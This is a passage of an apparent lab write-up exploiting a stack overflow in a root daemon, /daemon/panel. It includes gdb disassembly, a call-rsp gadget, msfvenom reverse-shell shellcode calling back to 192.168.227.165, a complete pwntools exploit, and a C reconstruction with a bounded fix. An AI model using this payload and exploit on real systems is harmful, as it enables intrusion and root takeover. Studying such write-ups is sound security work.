root 30 0.0 0.0 0 0 ? S< 05:12 0:00 [bioset]
root 31 0.0 0.0 0 0 ? S< 05:12 0:00 [kblockd]
root 32 0.0 0.0 0 0 ? S< 05:12 0:00 [devfreq_wq]
root 33 0.0 0.0 0 0 ? S< 05:12 0:00 [watchdogd]
root 34 0.0 0.0 0 0 ? S 05:12 0:00 [kswapd0]
root 35 0.0 0.0 0 0 ? S< 05:12 0:00 [vmstat]
root 47 0.0 0.0 0 0 ? S< 05:12 0:00 [kthrotld]
root 49 0.0 0.0 0 0 ? S< 05:12 0:00 [ipv6_addrconf]
root 91 0.0 0.0 0 0 ? S< 05:12 0:00 [mpt_poll_0]
root 93 0.0 0.0 0 0 ? S< 05:12 0:00 [ata_sff]
root 95 0.0 0.0 0 0 ? S< 05:12 0:00 [mpt/0]
root 122 0.0 0.0 0 0 ? S 05:12 0:00 [scsi_eh_0]
root 123 0.0 0.0 0 0 ? S< 05:12 0:00 [scsi_tmf_0]
root 124 0.0 0.0 0 0 ? S< 05:12 0:00 [bioset]
root 125 0.0 0.0 0 0 ? S 05:12 0:00 [scsi_eh_1]
root 126 0.0 0.0 0 0 ? S< 05:12 0:00 [scsi_tmf_1]
root 127 0.0 0.0 0 0 ? S 05:12 0:00 [scsi_eh_2]
root 128 0.0 0.0 0 0 ? S< 05:12 0:00 [scsi_tmf_2]
root 148 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/0:1H]
root 149 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/1:1H]
root 182 0.0 0.0 0 0 ? S 05:12 0:00 [jbd2/sda1-8]
root 183 0.0 0.0 0 0 ? S< 05:12 0:00 [ext4-rsv-conver]
root 215 0.0 0.2 51188 5648 ? Ss 05:12 0:00 /lib/systemd/systemd-journald
root 216 0.0 0.0 0 0 ? S 05:12 0:00 [kauditd]
root 230 0.0 0.2 47276 5536 ? Ss 05:12 0:00 /lib/systemd/systemd-udevd
root 304 0.0 0.0 0 0 ? S< 05:12 0:00 [nfit]
root 310 0.0 0.0 0 0 ? S< 05:12 0:00 [ttm_swap]
root 442 0.0 0.1 29664 2864 ? Ss 05:12 0:00 /usr/sbin/cron -f
root 443 0.0 0.1 250116 3324 ? Ssl 05:12 0:00 /usr/sbin/rsyslogd -n
root 454 0.0 0.2 46520 4752 ? Ss 05:12 0:00 /lib/systemd/systemd-logind
root 470 0.0 1.3 235880 26812 ? Ss 05:12 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
root 477 0.0 0.0 4040 904 ? Ss 05:12 0:00 /daemon/panel
root 489 0.0 0.0 14536 1692 tty1 Ss+ 05:12 0:00 /sbin/agetty --noclear tty1 linux
root 496 0.0 0.3 69944 6324 ? Ss 05:12 0:00 /usr/sbin/sshd -D
root 517 0.0 0.0 159504 1676 ? Ss 05:12 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
root 537 0.0 1.2 277864 25876 ? Ss 05:12 0:00 /usr/sbin/apache2 -k start
root 638 0.0 0.0 8572 780 ? Ss 05:12 0:00 /usr/sbin/knockd -i ens33
root 702 0.0 0.1 20472 3004 ? Ss 05:12 0:00 /sbin/dhclient -4 -v -pf /run/dhclient.ens33.pid -lf /var/lib/dhcp/dhclient.ens33.leases -I -df /var/lib/dhcp/dhclient6.ens33.leases ens33
root 1076 0.0 0.0 4040 84 ? S 05:56 0:00 /daemon/panel
root 14100 0.0 0.0 0 0 ? S 07:09 0:00 [kworker/0:2]
root 14591 0.0 0.0 0 0 ? S 08:44 0:00 [kworker/0:3]
root 14761 0.0 0.0 0 0 ? S 09:09 0:00 [kworker/1:0]
root 14868 0.0 0.0 0 0 ? S 09:30 0:00 [kworker/u256:0]
root 15013 0.0 0.0 0 0 ? S 09:39 0:00 [kworker/1:1]
root 15046 0.0 0.0 0 0 ? S 09:46 0:00 [kworker/u256:2]
root 15125 0.0 0.3 95172 6772 ? Ss 09:53 0:00 sshd: demon [priv]
root 15155 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/1:2]
root 15158 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/0:0]
root 15159 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/1:3]
root 15181 0.0 0.0 0 0 ? S 09:55 0:00 [kworker/u256:1]
demon 15198 0.0 0.0 12784 984 pts/1 R+ 09:58 0:00 grep root

There is a /daemon/panel running as root. Recalling port 31337 from earlier, I guessed this is the program listening there and downloaded it for analysis.

Seeing strcpy called in handlecmd, a buffer overflow naturally comes to mind, so I opened the binary locally in gdb to debug it.

root@kali:~# gdb panel
GNU gdb (Debian 8.2.1-2) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from panel...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000000004009ab <+0>: push rbp
0x00000000004009ac <+1>: mov rbp,rsp
0x00000000004009af <+4>: sub rsp,0x1050
0x00000000004009b6 <+11>: call 0x400820 <fork@plt>
0x00000000004009bb <+16>: mov DWORD PTR [rbp-0x4],eax
0x00000000004009be <+19>: cmp DWORD PTR [rbp-0x4],0x0
0x00000000004009c2 <+23>: jne 0x400b75 <main+458>
0x00000000004009c8 <+29>: mov DWORD PTR [rbp-0x8],0x1
0x00000000004009cf <+36>: mov DWORD PTR [rbp-0x14],0x1
0x00000000004009d6 <+43>: mov edx,0x0
0x00000000004009db <+48>: mov esi,0x1
0x00000000004009e0 <+53>: mov edi,0x2
0x00000000004009e5 <+58>: call 0x400830 <socket@plt>
0x00000000004009ea <+63>: mov DWORD PTR [rbp-0xc],eax
0x00000000004009ed <+66>: cmp DWORD PTR [rbp-0xc],0xffffffff
0x00000000004009f1 <+70>: jne 0x4009ff <main+84>
0x00000000004009f3 <+72>: lea rdi,[rip+0x226] # 0x400c20
0x00000000004009fa <+79>: call 0x400936 <fatal>
0x00000000004009ff <+84>: lea rdx,[rbp-0x14]
0x0000000000400a03 <+88>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400a06 <+91>: mov r8d,0x4
0x0000000000400a0c <+97>: mov rcx,rdx
0x0000000000400a0f <+100>: mov edx,0x2
0x0000000000400a14 <+105>: mov esi,0x1
0x0000000000400a19 <+110>: mov edi,eax
0x0000000000400a1b <+112>: call 0x400760 <setsockopt@plt>
0x0000000000400a20 <+117>: cmp eax,0xffffffff
0x0000000000400a23 <+120>: jne 0x400a31 <main+134>
0x0000000000400a25 <+122>: lea rdi,[rip+0x207] # 0x400c33
0x0000000000400a2c <+129>: call 0x400936 <fatal>
0x0000000000400a31 <+134>: mov WORD PTR [rbp-0x30],0x2
0x0000000000400a37 <+140>: mov edi,0x7a69
0x0000000000400a3c <+145>: call 0x400780 <htons@plt>
0x0000000000400a41 <+150>: mov WORD PTR [rbp-0x2e],ax
0x0000000000400a45 <+154>: mov DWORD PTR [rbp-0x2c],0x0
0x0000000000400a4c <+161>: lea rax,[rbp-0x30]
0x0000000000400a50 <+165>: add rax,0x8
0x0000000000400a54 <+169>: mov edx,0x8
0x0000000000400a59 <+174>: mov esi,0x0
0x0000000000400a5e <+179>: mov rdi,rax
0x0000000000400a61 <+182>: call 0x4007b0 <memset@plt>
0x0000000000400a66 <+187>: lea rcx,[rbp-0x30]
0x0000000000400a6a <+191>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400a6d <+194>: mov edx,0x10
0x0000000000400a72 <+199>: mov rsi,rcx
0x0000000000400a75 <+202>: mov edi,eax
0x0000000000400a77 <+204>: call 0x4007e0 <bind@plt>
0x0000000000400a7c <+209>: cmp eax,0xffffffff
0x0000000000400a7f <+212>: jne 0x400a8d <main+226>
0x0000000000400a81 <+214>: lea rdi,[rip+0x1c0] # 0x400c48
0x0000000000400a88 <+221>: call 0x400936 <fatal>
0x0000000000400a8d <+226>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400a90 <+229>: mov esi,0x5
0x0000000000400a95 <+234>: mov edi,eax
0x0000000000400a97 <+236>: call 0x4007d0 <listen@plt>
0x0000000000400a9c <+241>: cmp eax,0xffffffff
0x0000000000400a9f <+244>: jne 0x400aad <main+258>
0x0000000000400aa1 <+246>: lea rdi,[rip+0x1b2] # 0x400c5a
0x0000000000400aa8 <+253>: call 0x400936 <fatal>
0x0000000000400aad <+258>: mov DWORD PTR [rbp-0x44],0x10
0x0000000000400ab4 <+265>: lea rdx,[rbp-0x44]
0x0000000000400ab8 <+269>: lea rcx,[rbp-0x40]
0x0000000000400abc <+273>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400abf <+276>: mov rsi,rcx
0x0000000000400ac2 <+279>: mov edi,eax
0x0000000000400ac4 <+281>: call 0x4007f0 <accept@plt>
0x0000000000400ac9 <+286>: mov DWORD PTR [rbp-0x10],eax
0x0000000000400acc <+289>: cmp DWORD PTR [rbp-0x10],0xffffffff
0x0000000000400ad0 <+293>: jne 0x400ade <main+307>
0x0000000000400ad2 <+295>: lea rdi,[rip+0x18b] # 0x400c64
0x0000000000400ad9 <+302>: call 0x400936 <fatal>
0x0000000000400ade <+307>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400ae1 <+310>: mov ecx,0x0
0x0000000000400ae6 <+315>: mov edx,0x1f
0x0000000000400aeb <+320>: lea rsi,[rip+0x186] # 0x400c78
0x0000000000400af2 <+327>: mov edi,eax
0x0000000000400af4 <+329>: call 0x400790 <send@plt>
0x0000000000400af9 <+334>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400afc <+337>: mov ecx,0x0
0x0000000000400b01 <+342>: mov edx,0x21
0x0000000000400b06 <+347>: lea rsi,[rip+0x18b] # 0x400c98
0x0000000000400b0d <+354>: mov edi,eax
0x0000000000400b0f <+356>: call 0x400790 <send@plt>
0x0000000000400b14 <+361>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400b17 <+364>: mov ecx,0x0
0x0000000000400b1c <+369>: mov edx,0x19
0x0000000000400b21 <+374>: lea rsi,[rip+0x191] # 0x400cb9
0x0000000000400b28 <+381>: mov edi,eax
0x0000000000400b2a <+383>: call 0x400790 <send@plt>
0x0000000000400b2f <+388>: lea rsi,[rbp-0x1050]
0x0000000000400b36 <+395>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400b39 <+398>: mov ecx,0x0
0x0000000000400b3e <+403>: mov edx,0x1000
0x0000000000400b43 <+408>: mov edi,eax
0x0000000000400b45 <+410>: call 0x400740 <recv@plt>
0x0000000000400b4a <+415>: mov DWORD PTR [rbp-0x8],eax
0x0000000000400b4d <+418>: mov edx,DWORD PTR [rbp-0x10]
0x0000000000400b50 <+421>: lea rax,[rbp-0x1050]
0x0000000000400b57 <+428>: mov esi,edx
0x0000000000400b59 <+430>: mov rdi,rax
0x0000000000400b5c <+433>: call 0x400964 <handlecmd>
0x0000000000400b61 <+438>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400b64 <+441>: mov edi,eax
0x0000000000400b66 <+443>: call 0x4007c0 <close@plt>
0x0000000000400b6b <+448>: mov edi,0x0
0x0000000000400b70 <+453>: call 0x400800 <exit@plt>
0x0000000000400b75 <+458>: mov edi,0x0
0x0000000000400b7a <+463>: call 0x400810 <wait@plt>
0x0000000000400b7f <+468>: jmp 0x4009b6 <main+11>
End of assembler dump.
gdb-peda$ disassemble handlecmd
Dump of assembler code for function handlecmd:
0x0000000000400964 <+0>: push rbp
0x0000000000400965 <+1>: mov rbp,rsp
0x0000000000400968 <+4>: add rsp,0xffffffffffffff80
0x000000000040096c <+8>: mov QWORD PTR [rbp-0x78],rdi
0x0000000000400970 <+12>: mov DWORD PTR [rbp-0x7c],esi
0x0000000000400973 <+15>: mov rdx,QWORD PTR [rbp-0x78]
0x0000000000400977 <+19>: lea rax,[rbp-0x70]
0x000000000040097b <+23>: mov rsi,rdx
0x000000000040097e <+26>: mov rdi,rax
0x0000000000400981 <+29>: call 0x400750 <strcpy@plt>
0x0000000000400986 <+34>: lea rax,[rbp-0x70]
0x000000000040098a <+38>: mov rdi,rax
0x000000000040098d <+41>: call 0x400770 <strlen@plt>
0x0000000000400992 <+46>: mov rdx,rax
0x0000000000400995 <+49>: lea rsi,[rbp-0x70]
0x0000000000400999 <+53>: mov eax,DWORD PTR [rbp-0x7c]
0x000000000040099c <+56>: mov ecx,0x0
0x00000000004009a1 <+61>: mov edi,eax
0x00000000004009a3 <+63>: call 0x400790 <send@plt>
0x00000000004009a8 <+68>: nop
0x00000000004009a9 <+69>: leave
0x00000000004009aa <+70>: ret
End of assembler dump.
gdb-peda$ b *0x00000000004009aa
Breakpoint 1 at 0x4009aa
gdb-peda$ r
Starting program: /root/panel
[Attaching after process 29010 fork to child process 29014]
[New inferior 2 (process 29014)]
[Detaching after fork from parent process 29010]
[Inferior 1 (process 29010) detached]
[Switching to process 29014]

[----------------------------------registers-----------------------------------]
RAX: 0xc9
RBX: 0x0
RCX: 0x7ffff7ee285d (<__libc_send+29>: cmp rax,0xfffffffffffff000)
RDX: 0xc9
RSI: 0x7fffffffd410 ('a' <repeats 200 times>...)
RDI: 0x4
RBP: 0x6161616161616161 ('aaaaaaaa')
RSP: 0x7fffffffd488 ('a' <repeats 80 times>, "\n")
RIP: 0x4009aa (<handlecmd+70>: ret)
R8 : 0x0
R9 : 0x0
R10: 0x0
R11: 0x246
R12: 0x400840 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe5c0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x4009a3 <handlecmd+63>: call 0x400790 <send@plt>
0x4009a8 <handlecmd+68>: nop
0x4009a9 <handlecmd+69>: leave
=> 0x4009aa <handlecmd+70>: ret
0x4009ab <main>: push rbp
0x4009ac <main+1>: mov rbp,rsp
0x4009af <main+4>: sub rsp,0x1050
0x4009b6 <main+11>: call 0x400820 <fork@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffd488 ('a' <repeats 80 times>, "\n")
0008| 0x7fffffffd490 ('a' <repeats 72 times>, "\n")
0016| 0x7fffffffd498 ('a' <repeats 64 times>, "\n")
0024| 0x7fffffffd4a0 ('a' <repeats 56 times>, "\n")
0032| 0x7fffffffd4a8 ('a' <repeats 48 times>, "\n")
0040| 0x7fffffffd4b0 ('a' <repeats 40 times>, "\n")
0048| 0x7fffffffd4b8 ('a' <repeats 32 times>, "\n")
0056| 0x7fffffffd4c0 ('a' <repeats 24 times>, "\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "panel" hit Breakpoint 1, 0x00000000004009aa in handlecmd ()

We can see that the overflow is real: of the 200 a's, everything after the first 120 lands at what RSP points to at the ret, i.e. from the return address slot onward. So I can look for a call rsp or jmp rsp instruction and make it jump to the shellcode I lay out.
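Two things in the disassembly above make this overflow possible: main() stores recv()'s byte count at [rbp-0x8] and never uses it, and handlecmd() copies the client's buffer with strcpy() into a 0x70-byte stack buffer with no bound, so the copy runs to whatever NUL it happens to find. The C below is an added example reconstructed from that disassembly, not the daemon's source: handlecmd_vulnerable() mirrors the original logic, handlecmd_safe() shows the fix (honour the length recv() returned, cap the copy to the buffer, terminate explicitly), and message_overflows() states the bound. An echo buffer stands in for send() so the code runs without a socket; the function names and the sample input are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Sizes read off the disassembly on the page. */
#define CMD_BUF   0x70    /* handlecmd's local buffer at [rbp-0x70] */
#define RECV_MAX  0x1000  /* main's recv() length into its 0x1050-byte frame buffer */

/*
 * Reconstruction of the vulnerable logic: the client's bytes are copied with
 * strcpy() into a fixed 0x70-byte stack buffer, so anything longer walks over
 * the saved rbp and the return address. Only ever call this with short input.
 */
size_t handlecmd_vulnerable(const char *msg, char *echo, size_t echosz) {
    char cmd[CMD_BUF];
    strcpy(cmd, msg);                       /* no bound: this is the bug */
    size_t n = strlen(cmd);
    snprintf(echo, echosz, "%s", cmd);      /* stands in for send(sock, cmd, n, 0) */
    return n;
}

/*
 * Hardened version: use the byte count recv() returned instead of trusting a
 * terminator, cap the copy to the buffer, and terminate explicitly. Returns the
 * number of bytes echoed; input beyond CMD_BUF-1 bytes is dropped rather than
 * written past the buffer.
 */
size_t handlecmd_safe(const char *msg, size_t msglen, char *echo, size_t echosz) {
    char cmd[CMD_BUF];
    if (msglen > RECV_MAX) msglen = RECV_MAX;   /* never more than recv() could deliver */
    size_t n = 0;
    while (n < msglen && msg[n] != '\0') n++;   /* bounded length: stop at NUL or msglen */
    if (n > CMD_BUF - 1) n = CMD_BUF - 1;
    memcpy(cmd, msg, n);
    cmd[n] = '\0';
    snprintf(echo, echosz, "%s", cmd);
    return n;
}

/* Does an n-byte NUL-free message overrun the buffer in the vulnerable version? */
int message_overflows(size_t n) {
    return n + 1 > CMD_BUF;   /* strcpy also writes the terminator */
}

int main(void) {
    char echo[RECV_MAX];
    char big[200];                              /* constructed 199-byte message of 'a' */
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    size_t echoed = handlecmd_safe(big, strlen(big), echo, sizeof echo);
    printf("safe handler echoed %zu of %zu bytes\n", echoed, strlen(big));
    printf("a %zu-byte message overflows the original: %d\n",
           strlen(big), message_overflows(strlen(big)));
    return 0;
}
```

Beyond the bounded copy, note what the disassembly does not show: there is no stack-canary check before leave/ret, and the function addresses are fixed in the 0x400000 range, so the binary is not position independent. That is what makes a fixed gadget address usable in the next step; building with the stack protector and PIE would remove both conveniences even with the strcpy bug still present.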

gdb-peda$ jmpcall
0x400728 : call rax
0x400895 : jmp rax
0x4008e3 : jmp rax
0x40092e : call rax
0x400cfb : call rsp
0x400d6b : call [rax]

0x400cfb : call rsp is the one to use. Next comes generating the shellcode with msfvenom. Note that the program triggers the overflow through strcpy, so the shellcode must not contain null bytes, otherwise it gets truncated.

root@kali:~# msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=192.168.227.165 LPORT=12345 -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=17, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes
Final size of python file: 586 bytes
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\x6c\x40\xab\x94\x77\xcc\xad"
buf += "\x11\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x06\x69\xf3\x0d\x1d\xce\xf2\x7b\x6d\x1e\xa4\x91\x3f"
buf += "\x5b\xe5\xa8\x6e\x40\x9b\xad\xb7\x64\x4e\xb4\x3d\x08"
buf += "\x22\x72\x1d\xdc\xf7\x7b\x46\x18\xa4\x91\x1d\xcf\xf3"
buf += "\x59\x93\x8e\xc1\xb5\x2f\xc3\xa8\x64\x9a\x2a\x90\xcc"
buf += "\xee\x84\x16\x3e\x0e\x29\xc5\xbb\x04\xa4\xad\x42\x24"
buf += "\xc9\x4c\xc6\x20\x84\x24\xf7\x63\x45\xab\x94\x77\xcc"
buf += "\xad\x11"

So the final exploit looks like this:

from pwn import *

# Python 2 / pwntools: the payload is assembled as a str.

# Reverse-shell shellcode from msfvenom (linux/x64/shell_reverse_tcp, x64/xor
# encoded so it contains no null bytes, 119 bytes). One leading NOP makes the
# payload exactly 120 bytes, i.e. everything up to the return address slot.
buf = "\x90"
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xe9\xcc\x90\x7d\x82\x16\xb2"
buf += "\x98\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x83\xe5\xc8\xe4\xe8\x14\xed\xf2\xe8\x92\x9f\x78\xca"
buf += "\x81\xfa\x21\xeb\xcc\xa0\x44\x42\xbe\x51\x3d\xb8\x84"
buf += "\x19\x9b\xe8\x06\xe8\xf2\xc3\x94\x9f\x78\xe8\x15\xec"
buf += "\xd0\x16\x02\xfa\x5c\xda\x19\xb7\xed\x1f\xa6\xab\x25"
buf += "\x1b\x5e\x09\xb7\x8b\xa5\xfe\x52\xf1\x7e\xb2\xcb\xa1"
buf += "\x45\x77\x2f\xd5\x5e\x3b\x7e\xe6\xc9\x90\x7d\x82\x16"
buf += "\xb2\x98"

# Return address slot: the "call rsp" gadget at 0x400cfb found with jmpcall.
buf += p32(0x400cfb)

#print buf

# Connect to the daemon, wait for its "=>" prompt, then send the payload.
r = remote("192.168.227.191", 31337)
r.recvuntil("=>")
r.sendline(buf)

Listen on port 12345 on the local machine first, then run the exploit: a reverse shell running as root comes back.